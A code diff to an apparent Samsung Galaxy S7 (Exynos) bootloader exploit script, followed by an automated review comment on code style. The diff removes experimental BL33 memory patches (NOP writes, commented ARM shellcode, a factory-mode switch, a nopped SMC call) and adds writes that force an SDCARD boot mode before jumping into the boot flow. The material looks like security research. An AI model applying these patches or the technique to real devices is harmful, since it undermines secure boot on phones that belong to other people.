diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py
index ec9f52b..d90dd22 100644
--- a/source/exploit/exploit.py
+++ b/source/exploit/exploit.py
@@ -798,76 +798,17 @@ class ExynosDevice():
 # Sends stage 5 (BL33) but returns to debugger after sending.
 stage4 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()
- print_payload = open("/home/jonathan/projects/samsung_s7/source/screen_print/print.bin", "rb").read()
- off = stage4.find(bytes.fromhex("fd 7b bd a9 fd 03 00 91 f3 53 01 a9 d4 08 00 d0 f3 03 01 2a a0 17 00 f9"))
- stage4 = stage4[off:] + print_payload + stage4[off+len(print_payload):]
+ # print_payload = open("/home/jonathan/projects/samsung_s7/source/screen_print/print.bin", "rb").read()
+ # off = stage4.find(bytes.fromhex("fd 7b bd a9 fd 03 00 91 f3 53 01 a9 d4 08 00 d0 f3 03 01 2a a0 17 00 f9"))
+ # stage4 = stage4[off:] + print_payload + stage4[off+len(print_payload):]
 self.send_normal_stage(stage4)
 self.connect_device()
 self.usb_read(0x200) # GiAs
- # # Modify something in BL33
- print(self.cd.arch_dbg.state.print_ctx())
- print(self.cd.memdump_region(0x8f063710, 0x8))
- self.cd.memwrite_region(0x8f063710, struct.pack('>I', 0x53614d74))
- print(self.cd.memdump_region(0x8f063710, 0x8))
-
- # Modify USB Recovyer mode string to: NFI Patched BL33
- # patch_string = b'\x4e\x46\x49\x20\x50\x61\x74\x63\x68\x69\x6e\x67\x20\x42\x4c\x33\x33'
- # self.cd.memwrite_region(0x8f06ab10, patch_string)
-
- # Print state of x30/LR on screen
- self.cd.memwrite_region(0x8f063718, struct.pack('>I', 0x61616161))
-
- ### ==================== Writing nops to code cave
- # Write NOP from 0x8f008cb8 to 0x8f008d14 using self.cd.memwrite
- for i in range(0x8f008cb8, 0x8f008d14, 4):
- self.cd.memwrite_region(i, b'\x1f\x20\x03\xd5')
- #self.cd.memwrite_region(0x8f008cb8, struct.pack('>I', 0x1f2003d5))
-
- # Overwrite the data pointer showing 'USB Recovery Mode' to something else
- # self.cd.memwrite_region(0x8f01dc00, struct.pack('>I', 0x24080090))
-
- # Overwrite a str to a something else
- # self.cd.memwrite_region(0x8f01dc28, struct.pack('>I', 0xe40300f9))
-
- # Nop initial show usb recovery mode screen function
- # self.cd.memwrite_region(0x8f022654, struct.pack('>I', 0x1f2003d5))
- self.cd.memwrite_region(0x8f022654, struct.pack('>I', 0xe4ff9fd2))
-
- # Modify a mov function (0xffff into x4). If this is not nopped, or adjusted, the device will crash. But will try to continue booting (?)
- self.cd.memwrite_region(0x8f022658, struct.pack('>I', 0x1f2003d5)) #0xe5031daa.
-
- # Overwrite log function to display screen at end of nops
- self.cd.memwrite_region(0x8f02265c, struct.pack('>I', 0xbbffff97)) #0xbbffff97
- # ==================
-
- # for i in range(0x8f008cd8, 0x8f008cf4, 4):
- # self.cd.memwrite_region(i, struct.pack('>I', 0x1f2003d5))
-
- # # Write shellcode to set some contents on x0 to x5 registers
- # shellcode = f"""
- # // x5 is the address at x0
- # mov x5, x0
- # mov x0, 0x1234
- # mov x1, 0x12
- # mov x2, 0xffff
- # mov x3, 0xffff
- # mov x4, 0xffff
- # bl 0x8f025fb8
- # // ret
- # """
- # shellcode = ks.asm(shellcode, as_bytes=True)[0]
- # self.cd.memwrite_region(0x8f008cd8, shellcode)
-
- # Nop a adrp towards 0x8f09a000
- self.cd.memwrite_region(0x8f008cb8, struct.pack('>I', 0x1f2003d5))
-
- # ODIN MODE to FACTORY mode
- self.cd.memwrite_region(0x8f0114f8, struct.pack('>I', 0x82008052))
-
- # Nop a SMC call in BL2
- self.cd.memwrite_region(0x02059650, struct.pack('>I', 0x1f2003d5))
+ # Change bootmode to SDCARD (allow normal booting, if pressing volume up)
+ self.cd.memwrite_region(0x8f01dbdc, struct.pack('>I', 0x03030035))
+ self.cd.memwrite_region(0x8f01dbe0, struct.pack('>I', 0x80f9ff34))
 # Jump into a different function that continues the boot flow (different than BL33_LR)
 self.cd.restore_stack_and_jump(0x02024e5c)
diff --git a/source/exploit/ttbr0_el3.pkl b/source/exploit/ttbr0_el3.pkl
index bb23d5b..19c5332 100644
Binary files a/source/exploit/ttbr0_el3.pkl and b/source/exploit/ttbr0_el3.pkl differ
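Review bot: The three new `# print_payload` / `# off` / `# stage4` lines keep dead code as comments, including an absolute `/home/jonathan/...` path that only resolves on one machine; version history already preserves the removed variant, so delete these lines outright, or, if the print-payload build is still wanted, make the path a module-level constant or argument instead of a commented literal. The two new `memwrite_region` calls at `0x8f01dbdc` and `0x8f01dbe0` write bare constants with no record of what they replace, so a later reader cannot tell whether the patch is being applied to the intended firmware build or revert it; a comment of the form `# <ADDR>: original word <ORIG_WORD_PLACEHOLDER> -> patched word (bootmode SDCARD)` per write would make the change reviewable. The unchanged `stage4 = open(...).read()` on the context line above leaves the file handle to the garbage collector; `with open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb") as f: stage4 = f.read()` is the idiom and is worth fixing while this block is being touched. The enclosing method starts before the hunk, so its signature and any earlier setup are not visible here.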